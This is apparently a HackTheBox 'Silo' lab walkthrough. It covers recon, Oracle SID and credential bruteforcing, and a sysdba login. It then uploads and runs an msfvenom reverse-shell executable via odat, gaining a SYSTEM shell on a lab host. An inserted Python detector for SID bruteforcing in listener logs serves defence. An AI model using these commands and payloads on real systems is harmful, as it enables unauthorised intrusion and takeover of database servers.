HTB: Silo


Summary

Silo was a machine that, above anything else, really taught how to enumerate an Oracle SQL database. You first bruteforce SIDs for the database, which are kind of like database names but for Oracle. With these SIDs you then bruteforce usernames and find that a default account is enabled on one of the SIDs. That account has the sysdba privilege, meaning you can run everything as sysdba, which is kind of like running sudo but for Oracle. That gives you permission to execute code on the remote machine, and more importantly allows you to upload a malicious exe file and execute it, which gives you a reverse shell as SYSTEM because the Oracle database is running in the context of SYSTEM, so there is no priv esc required for this machine. So without further ado, let's get into Silo from HackTheBox!

Recon

$cat nmap/initial.txt
# Nmap 7.91 scan initiated Sat Jul 24 15:07:33 2021 as: nmap -A -oN nmap/initial.txt 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.094s latency).
Not shown: 987 closed ports
PORT      STATE    SERVICE        VERSION
80/tcp    open     http           Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open     oracle-tns     Oracle TNS listener 11.2.0.2.0 (unauthorized)
3367/tcp  filtered satvid-datalnk
49152/tcp open     msrpc          Microsoft Windows RPC
49153/tcp open     msrpc          Microsoft Windows RPC
49154/tcp open     msrpc          Microsoft Windows RPC
49155/tcp open     msrpc          Microsoft Windows RPC
49159/tcp open     oracle-tns     Oracle TNS listener (requires service name)
49160/tcp open     msrpc          Microsoft Windows RPC
49161/tcp open     msrpc          Microsoft Windows RPC
--snipped---

And then an all-port scan:

$nmap -p- --min-rate 1000 -oN nmap/all-ports.txt $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 15:12 BST
Stats: 0:02:47 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 45.74% done; ETC: 15:18 (0:03:17 remaining)
Warning: 10.10.10.82 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.82
Host is up (0.077s latency).
Not shown: 45308 closed ports, 20215 filtered ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49159/tcp open  unknown
49161/tcp open  unknown

Enumeration of Services

SMB 445

There wasn't anything I could get out of SMB; I just got access denied.

$smbclient -L //$ip/
Enter WORKGROUP\purplerabbit's password: 
session setup failed: NT_STATUS_ACCESS_DENIED
$smbmap -H $ip
[!] 445 not open on 10.10.10.82....

HTTP 80

Going over to the webpage shows a default Windows IIS server page.

Running gobuster against this webserver found no directories.

I also did a virtual host bruteforce on the server, but that didn't return anything of value.

RPC 135

Null RPC sessions were disabled:

$rpcclient -U '' $ip
Enter WORKGROUP\'s password: 
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

Oracle TNS Listener 1521

The Oracle TNS Listener is a separate process that receives incoming connections for the database server. Hacktricks has some good information on enumerating this service: https://book.hacktricks.xyz/pentesting/1521-1522-1529-pentesting-oracle-listener

Looking at the version shows that it's running 11.2.0.2.0:

$nmap --script "oracle-tns-version" -p 1521 -T4 -sV $ip
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 15:26 BST
Nmap scan report for 10.10.10.82
Host is up (0.12s latency).

PORT     STATE SERVICE    VERSION
1521/tcp open  oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.86 seconds

A Google search shows that there are no vulnerabilities related to this version: https://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-467/version_id-107266/Oracle-Database-Server-11.2.0.2.html

Attempting to enumerate SIDs with metasploit doesn't work, because the listener is protected:

msf6 auxiliary(scanner/oracle/sid_enum) > exploit

[-] 10.10.10.82:1521      - TNS listener protected for 10.10.10.82...
[*] 10.10.10.82:1521      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So I attempted to bruteforce SIDs using a metasploit module instead, and got a few SIDs:

msf6 auxiliary(admin/oracle/sid_brute) > exploit
[*] Running module against 10.10.10.82

[*] 10.10.10.82:1521 - Starting brute force on 10.10.10.82, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'CLRExtProc'
[+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID ''
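From the defender's side, a SID bruteforce like the one above is very visible in the listener's own log: every unknown SID the wordlist tries is rejected with TNS-12505 (status 12505 at the end of the establish record). The following Python detector is an added example, not part of the original writeup or of odat/metasploit; the listener.log lines are constructed here, and the record layout, the 60-second window and the threshold of three distinct rejected SIDs are assumptions you would tune for your own environment.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed listener.log excerpt (not taken from the writeup): one client walks
# through several SIDs within seconds; the listener rejects unknown ones with
# TNS-12505 (status 12505 at the end of the line) and accepts XE (status 0).
SAMPLE_LOG = """\
24-JUL-2021 15:30:01 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.16.91)(PORT=50001)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
24-JUL-2021 15:30:01 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.16.91)(PORT=50002)) * establish * PROD * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
24-JUL-2021 15:30:02 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.16.91)(PORT=50003)) * establish * TEST * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
24-JUL-2021 15:30:02 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.16.91)(PORT=50004)) * establish * XE * 0
24-JUL-2021 15:45:00 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.20.5)(PORT=41000)) * establish * XE * 0
24-JUL-2021 15:46:00 * (CONNECT_DATA=(SID=XF)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.20.5)(PORT=41001)) * establish * XF * 12505
"""

# Assumed establish-record layout: timestamp, CONNECT_DATA, client ADDRESS, status.
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* "
    r"\(CONNECT_DATA=\((?:SID|SERVICE_NAME)=(?P<sid>[^)]*)\).*?"
    r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=(?P<host>[^)]+)\).*? \* establish \* \S* \* (?P<status>\d+)$"
)
REJECTED = {"12505", "12514"}  # unknown SID / unknown service name

def parse_listener_log(text):
    """Return (timestamp, client_host, sid, rejected) tuples for establish records."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:  # TNS-xxxxx error lines and other record types are skipped
            ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
            events.append((ts, m["host"], m["sid"], m["status"] in REJECTED))
    return events

def find_sid_bruteforce(events, threshold=3, window=timedelta(seconds=60)):
    """Map each client host that had >= threshold distinct rejected SIDs inside one window to those SIDs."""
    by_host = defaultdict(list)
    for ts, host, sid, rejected in events:
        if rejected:
            by_host[host].append((ts, sid))
    flagged = {}
    for host, tries in by_host.items():
        tries.sort()
        for i, (start, _) in enumerate(tries):  # slide a window over this host's rejects
            sids = {s for t, s in tries[i:] if t - start <= window}
            if len(sids) >= threshold:
                flagged[host] = sorted(sids)
                break
    return flagged
```

The single typo-style reject from 10.10.20.5 stays below the threshold, so only the scanning client is reported; a real deployment would feed the live listener.log and alert on the flagged hosts.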

Next I attempted to enumerate usernames for these SIDs using odat (https://github.com/quentinhardy/odat), which I installed by following the instructions in its git repo.

I couldn't get any valid users with CLRExtProc and PLSExtProc; however, for XE odat found credentials:

$python3 odat.py all -s 10.10.10.82 -p 1521 -d XE
--snipped--
[+] Valid credentials found: scott/tiger. Continue...
--snipped--

Next I installed sqlplus, which was a real pain; however, this guide helped a lot: https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573

I was able to log in to the Oracle database using sqlplus; however, there wasn't much to see apart from the default tables.

$/opt/oracle/instantclient_21_1/sqlplus scott/tiger@$ip:1521/XE

SQL> select table_name from user_tables;

TABLE_NAME
------------------------------
DEPT
EMP
BONUS
SALGRADE

Looking at privileges shows this user only has CONNECT and RESOURCE:

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SCOTT                          CONNECT                        NO  YES NO
SCOTT                          RESOURCE                       NO  YES NO

Running odat with these credentials shows I can't do anything of interest:

$python3 odat.py all -U scott -P tiger -s 10.10.10.82 -p 1521 -d XE

This next part was probably the hardest part of the machine, because nothing I found while researching covered it. You needed to see that the scott user had the sysdba privilege, which is kind of like sudo but for Oracle: https://docs.oracle.com/database/121/ADMQS/GUID-2033E766-8FE6-4FBA-97E0-2607B083FA2C.htm#ADMQS12004

Running sqlplus with "as sysdba" shows we have a lot more privileges (note the session is now SYS):

$/opt/oracle/instantclient_21_1/sqlplus scott/tiger@$ip:1521/XE as sysdba

SQL> select * from user_role_privs;

USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYS                            ADM_PARALLEL_EXECUTE_TASK      YES YES NO
SYS                            APEX_ADMINISTRATOR_ROLE        YES YES NO
SYS                            AQ_ADMINISTRATOR_ROLE          YES YES NO
SYS                            AQ_USER_ROLE                   YES YES NO
SYS                            AUTHENTICATEDUSER              YES YES NO
SYS                            CONNECT                        YES YES NO
SYS                            CTXAPP                         YES YES NO
SYS                            DATAPUMP_EXP_FULL_DATABASE     YES YES NO
SYS                            DATAPUMP_IMP_FULL_DATABASE     YES YES NO
SYS                            DBA                            YES YES NO
SYS                            DBFS_ROLE                      YES YES NO
--snipped--

Running odat with --sysdba to see what we can do shows a lot more is available:

$python3 odat.py all -U scott -P tiger -s 10.10.10.82 -p 1521 -d XE --sysdba
[+] Checking if target 10.10.10.82:1521 is well configured for a connection...
[+] According to a test, the TNS listener 10.10.10.82:1521 is well configured. Continue...

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

[2] (10.10.10.82:1521): Testing all authenticated modules on sid:XE with the scott/tiger account
[2.1] UTL_HTTP library ?
[+] OK
[2.2] HTTPURITYPE library ?
[+] OK
[2.3] UTL_FILE library ?
[+] OK
[2.4] JAVA library ?
[-] KO
[2.5] DBMSADVISOR library ?
[+] OK
[2.6] DBMSSCHEDULER library ?
[+] OK
[2.7] CTXSYS library ?
[+] OK
[2.8] Hashed Oracle passwords ?
[+] OK
[2.9] Hashed Oracle passwords from history?
[+] OK
--snipped--

Shell as System

Looking at the diagram in odat's wiki of what each module can do shows a number of options.

I will first check whether I can execute code on the server:

$python3 odat.py dbmsscheduler -s $ip -d XE -U scott -P tiger --exec "ping 10.10.16.91" --sysdba

[1] (10.10.10.82:1521): Execute the `ping 10.10.16.91` on the 10.10.10.82 server
[+] The `ping 10.10.16.91` command was executed on the 10.10.10.82 server
[+] The Job is running

Running tcpdump showed that I received pings from the remote host:

$sudo tcpdump -i tun0 icmp
[sudo] password for purplerabbit: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
08:43:03.407736 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 1, length 40
08:43:03.407841 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 1, length 40
08:43:04.588852 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 2, length 40
08:43:04.588905 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 2, length 40
08:43:05.612807 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 3, length 40
08:43:05.612873 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 3, length 40
08:43:06.453765 IP silo.htb > 10.10.16.91: ICMP echo request, id 1, seq 4, length 40
08:43:06.453822 IP 10.10.16.91 > silo.htb: ICMP echo reply, id 1, seq 4, length 40

I then tried for several minutes to transfer netcat to get a reverse shell, but I kept getting this error whenever I tried to transfer it via SMB or PowerShell:

[-] The Job has failed: ORA-27370: job slave failed to launch a job of type EXECUTABLE
ORA-27300: OS system dependent operation:accessing job scheduler service failed with status: 109
ORA-27301: OS failure message: The pipe has been ended.
ORA-27302: failure occurred at: sjsec 9
ORA-27303: additional information: The pipe has been ended.

So I resorted to another way of getting a reverse shell on the machine.

First I generated an x86 Windows reverse shell with msfvenom:

$msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.91 LPORT=4444 -f exe > shell.exe

Next I uploaded this file to the remote machine using odat's utlfile module:

$python3 odat/odat.py utlfile -s $ip -d XE -U scott -P tiger --putFile "C:\Windows\Temp" shell.exe shell.exe --sysdba

I then executed the uploaded exe using the externaltable module (note that I'm taking the example syntax for all of these modules from odat's wiki: https://github.com/quentinhardy/odat/wiki/externaltable):

$python3 odat/odat.py externaltable -s $ip -d XE -U scott -P tiger --exec "C:\Windows\Temp" shell.exe --sysdba

This then gave a reverse shell as SYSTEM:

$nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.16.91] from silo.htb [10.10.10.82] 49168
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system

This means the Oracle database was running in the context of SYSTEM, so no privilege escalation was needed.

That was Silo from HackTheBox! Hope you enjoyed it.